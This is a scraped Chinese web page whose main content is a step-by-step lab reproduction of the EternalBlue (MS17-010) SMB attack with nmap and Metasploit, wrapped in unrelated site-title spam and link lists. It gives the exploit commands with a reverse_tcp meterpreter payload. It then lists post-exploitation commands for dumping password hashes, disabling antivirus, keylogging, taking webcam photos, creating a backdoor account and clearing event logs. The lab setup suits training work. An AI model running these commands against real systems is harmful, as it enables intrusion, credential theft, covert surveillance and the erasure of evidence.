当前位置: 首页 > news >正文

厦门建设局网站网站建设与维护心得体会

厦门建设局网站,网站建设与维护心得体会,商城网站建设专业公司,seo优1、永恒之蓝#xff08;Eternal Blue#xff09; 永恒之蓝是指2017年4月14日晚#xff0c;黑客团体Shadow Brokers#xff08;影子经纪人#xff09;公布一大批网络攻击工具#xff0c;其中包含“永恒之蓝”工具#xff0c;“永恒之蓝”利用Windows系统的SMB漏洞可以获…1、永恒之蓝Eternal Blue 永恒之蓝是指2017年4月14日晚黑客团体Shadow Brokers影子经纪人公布一大批网络攻击工具其中包含“永恒之蓝”工具“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招被勒索支付高额赎金才能解密恢复文件。 2、复现环境 角色操作系统IP地址攻击机kali192.168.126.131靶机Windows 7 家庭普通版192.168.126.147 注意VMware Workstation pro16安装win7靶机安装VWware tools时提示驱动无法自动安装是因为微软更新了驱动程序签名算法2019年开始弃用SHA1改用SHA2所以要打kb4474419补丁但是打上补丁后永恒之蓝漏洞会被修复所以安装完tools后需要把补丁卸载 3、漏洞复现 主机发现 利用kali的nmap进行扫描 nmap 192.168.126.147扫描到开放了445端口而永恒之蓝利用的就是445端口的smb服务操作系统溢出漏洞。 使用msf框架 在kali终端输入 # 进入msf模板库 msfconsole# 寻找MS17-010相关模板库 search ms17-010进入msf模块 使用auxiliary/scanner/smb/smb_ms17_010 模块扫描靶机是否存在该漏洞 # 选择使用exploit/windows/smb/ms17_010_psexec模块 msf6 use auxiliary/scanner/smb/smb_ms17_010查看模块需要配置的参数 show options图中Required值为yes的对应Current Setting都需要填写 设置参数后扫描 RHOSTS 参数是要探测主机的ip或ip范围 设置攻击目标ip # 设置目标主机IP set rhosts 192.168.126.147# 扫描 run提示主机容易被攻击 使用exploit/windows/smb/ms17_010_eternalblue攻击模块 # 使用攻击模块 use exploit/windows/smb/ms17_010_eternalblue# 查看漏洞信息 info# 查看可以攻击的系统 show targets# 查看该漏洞下可以使用的payload show payloads# 查看需要设置的参数 show options# 设置payload默认payload/windows/x64/meterpreter/reverse_tcp set payload windows/x64/meterpreter/reverse_tcp# 设置目标IP set rhosts 192.168.126.147# 执行攻击 run在这里可以执行文件上传下载获取截屏获取密码使用摄像头后门持久化等操作 4、后渗透阶段 在meterpreter 中我们可以使用以下的命令来实现对目标的操作 sysinfo #查看目标主机系统信息 run scraper #查看目标主机详细信息 hashdump #导出密码的哈希 load kiwi #加载 ps #查看目标主机进程信息 pwd #查看目标当前目录(windows) getlwd #查看目标当前目录(Linux) search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的文件 download e:\test.txt /root #将目标机的e:\test.txt文件下载到/root目录下 upload /root/test.txt d:\test #将/root/test.txt上传到目标机的 d:\test\ 目录下getpid #查看当前Meterpreter Shell的进程 PIDmigrate 1384 #将当前Meterpreter Shell的进程迁移到PID为1384的进程上 idletime #查看主机运行时间 getuid #查看获取的当前权限 getsystem #提权 run killav #关闭杀毒软件 screenshot #截图 webcam_list #查看目标主机的摄像头 webcam_snap #拍照 webcam_stream #开视频 execute 参数 -f 可执行文件 #执行可执行程序 run getgui -u hack -p 123 #创建hack用户密码为123 run getgui -e #开启远程桌面 keyscan_start #开启键盘记录功能 keyscan_dump #显示捕捉到的键盘记录信息 keyscan_stop #停止键盘记录功能 uictl disable keyboard #禁止目标使用键盘 uictl enable keyboard #允许目标使用键盘 uictl disable mouse #禁止目标使用鼠标 uictl enable mouse #允许目标使用鼠标 load #使用扩展库 run #使用扩展库 clearev #清除日志
http://www.hkea.cn/news/14547600/

相关文章:

  • 网页设计实训总结万能版宁波网站运营优化系统
  • 手表网网站wordpress不适合做大站
  • 网站seo优化是什么意思企业建站公司服务
  • 网站中的表格江苏城嘉建设工程有限公司网站
  • 电子工程师网站阿克苏网站建设一条龙服务
  • 免费建网站 高校社团官方网站沧州好的做网站的公司
  • 什么网站专做店铺商业网站设计欣赏
  • 百度网盘搜索引擎网站ppt下载免费网站
  • 厦门哪里做网站网站如何调用数据库
  • 太原网站建设小程序seo薪酬
  • 爱站网的关键词是怎么来的kratos的WordPress
  • 利用google地图标注做网站公司建站花费
  • 东莞建站模板大全宁波专业品牌网站制作外包
  • 阿里巴巴电子商务网站建设目的手机创建网站
  • 罗定城乡建设规划局网站排名优化上首页怎么做
  • 南京房产网站建设谷歌浏览器下载安卓版
  • 嘉兴网站推广公司第一ppt网ppt模板免费下载
  • 专业网站建设机构wordpress移动端底部导航栏
  • 深圳网站制作公司资讯劳动仲裁院网站建设
  • 深圳定制网站公司潍坊知名网站建设价格
  • 哪里有做网站推广重庆代还信用卡网站建设
  • 凉山州住房与城乡建设局网站免费网站大全app
  • 做网站属于It行业吗企业网站的用户需求
  • 安徽金鹏建设集团网站安装wordpress linux
  • 淘宝是行业门户网站的盈利模式是什么网站开发者工具post
  • 个人备案的网站能做盈利吗网站等保如何做
  • 招聘网站建设人员的要求类网站建设
  • 2018年深圳建设网站公司天津宏宇网站建设
  • 做暧在线观看网站做网站需要报备什么条件
  • 免费企业网站cms系统做网站枣庄